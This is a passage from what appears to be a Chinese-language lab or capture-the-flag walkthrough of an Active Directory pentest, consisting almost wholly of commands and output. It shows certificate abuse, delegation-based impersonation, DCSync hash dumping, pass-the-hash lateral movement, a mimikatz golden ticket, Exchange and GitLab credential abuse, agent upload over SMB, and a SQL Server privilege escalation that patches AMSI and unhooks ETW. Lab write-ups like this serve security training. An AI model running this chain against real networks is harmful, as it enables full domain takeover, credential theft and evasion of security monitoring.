RPC\n[proxychains] Dynamic chain ... xxx:9384 ... 172.24.7.3:445 ... OK\n[*] Successfully requested certificate\n[*] Request ID is 7\n[*] Got certificate with DNS Host Name 'DC.pentest.me'\n[*] Certificate has no object SID\n[*] Saved certificate and private key to 'dc.pfx'<\/code><\/pre>\n\n\n\nproxychains -q certipy-ad auth -pfx dc.pfx -dc-ip 172.24.7.3 -debug \nCertipy v4.7.0 - by Oliver Lyak (ly4k)\n\n[*] Using principal: dc$@pentest.me\n[*] Trying to get TGT...\n[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)<\/code><\/pre>\n\n\n\n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop]\n\u2514\u2500$ sudo openssl pkcs12 -in dc.pfx -nodes -out test.pem 1 \u2a2f\nEnter Import Password:\n \n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop]\n\u2514\u2500$ openssl rsa -in test.pem -out test.key\nwriting RSA key\n \n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop]\n\u2514\u2500$ openssl x509 -in test.pem -out test.crt\n<\/code><\/pre>\n\n\n\n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop\/Pentest\/PassTheCert-main\/Python]\n\u2514\u2500$ proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain pentest.me -dc-ip 172.24.7.3\n[proxychains] config file found: \/etc\/proxychains4.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.14\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:636 ... OK\n[*] You are logged in as: PENTEST\\DC$<\/code><\/pre>\n\n\n\n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop\/Pentest\/PassTheCert-main\/Python]\n\u2514\u2500$ proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain pentest.me -dc-ip 172.24.7.3 -delegate-to 'dc$' -delegate-from 'EVILCOMPUTER1$'\n[proxychains] config file found: \/etc\/proxychains4.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.14\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:636 ... OK\n[*] Accounts allowed to act on behalf of other identity:\n[*] EVILCOMPUTER1$ (S-1-5-21-3745972894-1678056601-2622918667-1154)\n[*] EVILCOMPUTER1$ can already impersonate users on dc$ via S4U2Proxy\n[*] Not modifying the delegation rights.\n[*] Accounts allowed to act on behalf of other identity:\n[*] EVILCOMPUTER1$ (S-1-5-21-3745972894-1678056601-2622918667-1154)<\/code><\/pre>\n\n\n\n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop\/Pentest\/PassTheCert-main\/Python]\n\u2514\u2500$ proxychains getST.py pentest.me\/'EVILCOMPUTER1$':'123@#ABC' -spn cifs\/dc.pentest.me -impersonate Administrator -dc-ip 172.24.7.3\n[proxychains] config file found: \/etc\/proxychains4.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.14\n\/usr\/lib\/python3\/dist-packages\/pkg_resources\/__init__.py:123: PkgResourcesDeprecationWarning: 2.3.0-nmu1-b1 is an invalid version and will not be supported in a future release\n warnings.warn(\nImpacket for Exegol - v0.10.1.dev1 - Copyright 2022 Fortra - forked by ThePorgs\n\n[-] CCache file is not found. Skipping...\n[*] Getting TGT for user\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:88 ... OK\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:88 ... OK\n[*] Impersonating Administrator\n[*] Requesting S4U2self\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:88 ... OK\n[*] Requesting S4U2Proxy\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.3:88 ... OK\n[*] Saving ticket in Administrator@cifs_dc.pentest.me@PENTEST.ME.ccache\n<\/code><\/pre>\n\n\n\nexport KRB5CCNAME=Administrator@cifs_dc.pentest.me@PENTEST.ME.ccache<\/code><\/pre>\n\n\n\nproxychains python3 psexec.py Administrator@dc.pentest.me -k -no-pass -dc-ip 172.24.7.3<\/code><\/pre>\n\n\n\nC:\\windows\\system32> type C:\\Users\\Administrator\\Desktop\\flag.txt\nflag{congratulations_get_DC!}<\/code><\/pre>\n\n\n\nproxychains python3 secretsdump.py -k -no-pass Administrator@dc.pentest.me -dc-ip 172.24.7.3\n...\n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... dc.pentest.me:135 ... OK\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... dc.pentest.me:49667 ... OK\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:5d0f79eaf7a6c0ad70bcfce6522d2da1:::\n...<\/code><\/pre>\n\n\n\nflag6<\/h2>\n\n\n\n
172.24.7.48(IZAYSXE6VCUHB4Z.pentest.me)<\/h3>\n\n\n\n
proxychains python3 wmiexec.py -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me\/Administrator@172.24.7.48 -codec gbk<\/code><\/pre>\n\n\n\nflag7<\/h2>\n\n\n\n
172.24.7.43(IZMN9U6ZO3VTRPZ.pentest.me)(172.26.8.12)<\/h3>\n\n\n\n
proxychains python3 wmiexec.py pentest.me\/administrator@172.24.7.43 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1<\/code><\/pre>\n\n\n\nflag8<\/h2>\n\n\n\n
172.25.12.7(172.24.7.5->172.25.12.0\/24)(\u8de8\u57df)(DCadmin.pen.me)<\/h3>\n\n\n\n
mimikatz # kerberos::golden \/user:administrator \/domain:PENTEST.ME \/sid:S-1-5-21-3745972894-1678056601-2622918667 \/krbtgt:08b1732d06c09e84119486cbb94a5569 \/sids:S-1-5-21-708081054-195637743-2881014444-519 \/ptt<\/code><\/pre>\n\n\n\nmimikatz.exe log \"lsadump::dcsync \/domain:PEN.ME \/all \/csv\" exit\nlog\nlsadump::dcsync \/domain:PEN.ME \/all \/csv\n...\n500 Administrator 0f91138ef5392b87416ed41cb6e810b7 512\n1148 exchange 21a43bd74a20a330ef77a4e7bd179d8c 66048\n...<\/code><\/pre>\n\n\n\npython3 wmiexec.py pen.me\/Administrator@172.24.7.43 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk<\/code><\/pre>\n\n\n\nflag9<\/h2>\n\n\n\n
172.25.12.19(exchange)(IZ1TUCEKFDPCEMZ.pen.me)<\/h3>\n\n\n\n
python3 wmiexec.py pen.me\/administrator@IZ1TUCEKFDPCEMZ.pen.me -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk<\/code><\/pre>\n\n\n\nflag10<\/h2>\n\n\n\n
proxychains python3 pthexchange.py --target https:\/\/172.25.12.19\/ --username exchange --password '00000000000000000000000000000000:21a43bd74a20a330ef77a4e7bd179d8c' --action Download<\/code><\/pre>\n\n\n\nflag11<\/h2>\n\n\n\n
172.25.12.29(IZ88QYK8Y8Y3VXZ.pen.me)<\/h3>\n\n\n\n
python3 wmiexec.py pen.me\/administrator@IZ88QYK8Y8Y3VXZ.pen.me -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk<\/code><\/pre>\n\n\n\nflag12<\/h2>\n\n\n\n
172.24.7.27(confluence) & 172.24.7.23(gitlab)<\/h3>\n\n\n\n
echo 'grant_type=password&username=usera&password=Admin3gv83' > auth.txt<\/code><\/pre>\n\n\n\nproxychains curl --data \"@auth.txt\" --request POST http:\/\/172.24.7.23\/oauth\/token\n<\/code><\/pre>\n\n\n\n{\"access_token\":\"access_token\u5177\u4f53\u503c\",\"token_type\":\"Bearer\",\"expires_in\":7200,\"refresh_token\":\"xxx\",\"scope\":\"api\",\"created_at\":xxx}<\/code><\/pre>\n\n\n\nproxychains4 curl --header \"Authorization: Bearer access_token\u5177\u4f53\u503c\" http:\/\/172.24.7.23\/api\/v4\/users | jq<\/code><\/pre>\n\n\n\nIP: 172.26.8.16\nusername: sa\npassword: sqlserver_2022<\/code><\/pre>\n\n\n\n172.26.8.16(172.24.7.43->172.26.8.0\/24)<\/h3>\n\n\n\n
\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop\/Pentest\/impacket-master\/examples]\n\u2514\u2500$ proxychains python3 smbclient.py -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me\/administrator@172.24.7.43\n[proxychains] config file found: \/etc\/proxychains4.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.14\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Dynamic chain ... 121.36.193.62:9384 ... 172.24.7.43:445 ... OK\nType help for list of commands\n# shares\nADMIN$\nC$\nIPC$\n# use C$\n# ls\n...\n...\n# put windows_x64_agent.exe\n# ls\n...\n-rw-rw-rw- 1504768 Wed Feb 7 08:23:17 2024 windows_x64_agent.exe\n...\n<\/code><\/pre>\n\n\n\n\u250c\u2500\u2500(fushuling\u327ffushuling)-[~\/Desktop\/PySQLTools-main]\n\u2514\u2500$ proxychains python3 PySQLTools.py sa:'sqlserver_2022'@172.26.8.16 -debug \n...\nSQL (sa dbo@master)> enable_ole\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 185: \u914d\u7f6e\u9009\u9879 'show advanced options' \u5df2\u4ece 1 \u66f4\u6539\u4e3a 1\u3002\u8bf7\u8fd0\u884c RECONFIGURE \u8bed\u53e5\u8fdb\u884c\u5b89\u88c5\u3002\n[+] Data from sqlserver: []\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 185: \u914d\u7f6e\u9009\u9879 'Ole Automation Procedures' \u5df2\u4ece 1 \u66f4\u6539\u4e3a 1\u3002\u8bf7\u8fd0\u884c RECONFIGURE \u8bed\u53e5\u8fdb\u884c\u5b89\u88c5\u3002\n[+] Data from sqlserver: []\n[*] Enable ole successfully!\nSQL (sa dbo@master)> enable_clr\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 185: \u914d\u7f6e\u9009\u9879 'show advanced options' \u5df2\u4ece 1 \u66f4\u6539\u4e3a 1\u3002\u8bf7\u8fd0\u884c RECONFIGURE \u8bed\u53e5\u8fdb\u884c\u5b89\u88c5\u3002\n[+] Data from sqlserver: []\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 185: \u914d\u7f6e\u9009\u9879 'clr enabled' \u5df2\u4ece 0 \u66f4\u6539\u4e3a 1\u3002\u8bf7\u8fd0\u884c RECONFIGURE \u8bed\u53e5\u8fdb\u884c\u5b89\u88c5\u3002\n[+] Data from sqlserver: []\n[*] Enable clr successfully!<\/code><\/pre>\n\n\n\nSQL (sa dbo@master)> install_clr\n[*] ALTER DATABASE master SET TRUSTWORTHY ON\n[+] Data from sqlserver: []\n[*] Set permission Done.\n[*] Import the assembly\n[+] Data from sqlserver: [{'': 1}]\n[*] Assembly execute done.\n[*] Link the assembly to a stored procedure\n[-] ERROR(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 1: \u6570\u636e\u5e93\u4e2d\u5df2\u5b58\u5728\u540d\u4e3a 'sp_help_text_tables' \u7684\u5bf9\u8c61\u3002\n[-] Create procedure error.\nSQL (sa dbo@master)> clr_badpotato whoami\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [+] Successfully unhooked ETW!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [+] Successfully Patch AMSI!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateNamedPipeW Success! IntPtr:980\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1990305077344\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] ConnectNamePipe Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CurrentUserName : MSSQL$SQLEXPRESS\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CurrentConnectPipeUserName : SYSTEM\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] ImpersonateNamedPipeClient Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] OpenThreadToken Success! IntPtr:816\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] DuplicateTokenEx Success! IntPtr:3428\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] SetThreadToken Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateOutReadPipe Success! out_read:3440 out_write:3444\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateErrReadPipe Success! err_read:3228 err_write:888\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateProcessWithTokenW Success! ProcessPid:3904\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: nt authority\\system\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: \n\n[+] Data from sqlserver: []\n<\/code><\/pre>\n\n\n\nSQL (sa dbo@master)> clr_badpotato \"type C:\\Users\\Administrator\\Desktop\\flag.txt\"\n[-] ERROR(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 1: \u201ctype\u201d\u9644\u8fd1\u6709\u8bed\u6cd5\u9519\u8bef\u3002\nSQL (sa dbo@master)> clr_badpotato type C:\\Users\\Administrator\\Desktop\\flag.txt\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [+] Successfully unhooked ETW!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [+] Successfully Patch AMSI!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateNamedPipeW Success! IntPtr:3280\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1990305077584\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] ConnectNamePipe Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CurrentUserName : MSSQL$SQLEXPRESS\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CurrentConnectPipeUserName : SYSTEM\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] ImpersonateNamedPipeClient Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] OpenThreadToken Success! IntPtr:3320\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] DuplicateTokenEx Success! IntPtr:768\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] SetThreadToken Success!\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateOutReadPipe Success! out_read:3384 out_write:3428\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateErrReadPipe Success! err_read:3324 err_write:832\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: [*] CreateProcessWithTokenW Success! ProcessPid:3932\n[*] INFO(iZx12evf5cx9zxZ\\SQLEXPRESS): Line 0: flag{Clr?no_flag}\n<\/code><\/pre>\n\n\n\n\u53c2\u8003<\/h2>\n\n\n\n